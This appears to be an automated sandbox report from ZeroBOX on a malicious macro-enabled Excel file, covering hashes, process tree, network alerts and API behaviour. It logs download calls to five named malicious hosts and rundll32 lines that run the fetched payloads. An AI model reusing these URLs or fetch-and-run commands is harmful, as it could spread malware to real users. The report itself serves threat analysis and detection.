Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 17, 2021, 10:14 a.m.	April 17, 2021, 10:24 a.m.

Size	82.4KB
Type	Microsoft Excel 2007+
MD5	`2f6bd277a917a4bca6216444ecbc1d62`
SHA256	`5328a955298f87e7cdb42251653b7d71bfb93af1911495e2400f788196054ebf`
CRC32	`E0E4C519`
ssdeep	`1536:T7MQ0CmrClu286aYbgBF+iy+fCn/dDuL7QQ64eyZJViW++poHn2:T4PF286aYbgE+qwXQQteyZJAW++42`
Yara	None matched

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\catalog-342909133.xlsm
3024
- rundll32.exe rundll32 ..\ghnrope.rue1,DllRegisterServer
  556
- rundll32.exe rundll32 ..\ghnrope.rue2,DllRegisterServer
  1632
- rundll32.exe rundll32 ..\ghnrope.rue3,DllRegisterServer
  1068
- rundll32.exe rundll32 ..\ghnrope.rue4,DllRegisterServer
  812
- rundll32.exe rundll32 ..\ghnrope.rue5,DllRegisterServer
  888

Name	Response	Post-Analysis Lookup
casadopai.net.br	A 192.185.214.152	192.185.214.152
jerry-dibbert16ih.ru.com	A 34.95.253.189	34.95.253.189
alexandrea-friesen16ka.ru.com	A 34.95.253.189	34.95.253.189
ri.posgradocolumbia.edu.py	A 50.87.146.86	50.87.146.86
useragent20.barloggio.net	A 116.0.21.14	116.0.21.14

IP Address	Status	Action
104.21.19.200	Active	Moloch
116.0.21.14	Active	Moloch
164.124.101.2	Active	Moloch
192.185.214.152	Active	Moloch
34.95.253.189	Active	Moloch
50.87.146.86	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.185.214.152:443 -> 192.168.56.101:49205	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49213 -> 116.0.21.14:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49202 -> 192.185.214.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 50.87.146.86:443 -> 192.168.56.101:49210	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49208 -> 50.87.146.86:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49209 -> 50.87.146.86:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49204 -> 192.185.214.152:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49212 -> 116.0.21.14:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 116.0.21.14:443 -> 192.168.56.101:49214	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Performs some HTTP requests (2 events)

request	GET http://jerry-dibbert16ih.ru.com/rocket.html
request	GET http://alexandrea-friesen16ka.ru.com/rocket.html

Allocates read-write-execute memory (usually to unpack itself) (21 events)

Time & API	Arguments	Status
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74f41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75241000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dc31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dc11000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6de21000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dbf1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dbe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:14 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dba1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dae1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dae1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6da71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6da31000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 17, 2021, 10:15 a.m.	process_identifier: 3024 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates (office) documents on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\~$catalog-342909133.xlsm

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile April 17, 2021, 10:14 a.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x000003a8 filepath: C:\Users\test22\AppData\Local\Temp\~$catalog-342909133.xlsm desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$catalog-342909133.xlsm create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Communicates with host for which no DNS query was performed (1 event)

host

104.21.19.200

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (5 events)

Time & API	Arguments	Status	Return
URLDownloadToFileW April 17, 2021, 10:14 a.m.	url: http://jerry-dibbert16ih.ru.com/rocket.html stack_pivoted: 0 filepath_r: ..\ghnrope.rue1 filepath: C:\Users\test22\ghnrope.rue1	1	0
URLDownloadToFileW April 17, 2021, 10:15 a.m.	url: http://alexandrea-friesen16ka.ru.com/rocket.html stack_pivoted: 0 filepath_r: ..\ghnrope.rue2 filepath: C:\Users\test22\ghnrope.rue2	1	0
URLDownloadToFileW April 17, 2021, 10:15 a.m.	url: https://casadopai.net.br/drms/rocket.html stack_pivoted: 0 filepath_r: ..\ghnrope.rue3 filepath: C:\Users\test22\ghnrope.rue3		2148270085
URLDownloadToFileW April 17, 2021, 10:15 a.m.	url: https://ri.posgradocolumbia.edu.py/drms/rocket.html stack_pivoted: 0 filepath_r: ..\ghnrope.rue4 filepath: C:\Users\test22\ghnrope.rue4		2148270085
URLDownloadToFileW April 17, 2021, 10:15 a.m.	url: https://useragent20.barloggio.net/drms/rocket.html stack_pivoted: 0 filepath_r: ..\ghnrope.rue5 filepath: C:\Users\test22\ghnrope.rue5		2148270085

One or more non-whitelisted processes were created (5 events)

parent_process	excel.exe	martian_process	rundll32 ..\ghnrope.rue3,DllRegisterServer
parent_process	excel.exe	martian_process	rundll32 ..\ghnrope.rue2,DllRegisterServer
parent_process	excel.exe	martian_process	rundll32 ..\ghnrope.rue5,DllRegisterServer
parent_process	excel.exe	martian_process	rundll32 ..\ghnrope.rue4,DllRegisterServer
parent_process	excel.exe	martian_process	rundll32 ..\ghnrope.rue1,DllRegisterServer

Generates some ICMP traffic

catalog-342909133.xlsm

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All